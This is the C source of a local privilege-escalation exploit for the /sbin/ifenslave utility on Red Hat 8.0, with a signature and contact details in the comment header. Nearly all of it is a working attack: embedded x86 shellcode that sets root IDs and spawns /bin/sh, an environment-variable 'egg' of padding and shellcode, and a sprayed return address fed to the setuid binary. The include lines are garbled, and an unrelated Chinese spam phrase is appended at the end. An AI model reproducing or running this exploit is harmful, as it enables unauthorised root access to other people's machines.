/* * lame local /sbin/ifenslave buffer overrun exploit * tested on redhat 8.0 * by v1pee//nerf, nerf.ru * v1pee@ngs.ru */ #include char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" "\x31\xc0\x50\x50\xb0\xb5\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; long getsp() { __asm__("movl %esp,%eax"); } int main(int argc, char *argv[]) { char *buffer, *shity, *ptr; long *addr_ptr, addr; int i, offset=0; int bufsize=128; int eggsize=512; if (argc > 1) offset = atoi(argv[1]); if (argc > 2) eggsize = atoi(argv[2]); buffer = malloc(bufsize); shity = malloc(eggsize); addr = getsp() - offset; printf("local /sbin/ifenslave exploit (red hat 8.0)\n"); printf("RET: 0x%x\nOffset: %d\n", addr,offset); ptr = buffer; addr_ptr = (long *) ptr; // fills rets for (i = 0; i < bufsize; i+=4) *(addr_ptr++) = addr; ptr = shity; // fills NOP instructions in for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = 0x41; // fills shellcode for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; setenv("EGG",shity,4); // consists of nops and shellcode setenv("XXX",buffer,4); // consists of addrs to new envp system("/sbin/ifenslave -a $XXX"); }

亚洲欧美在线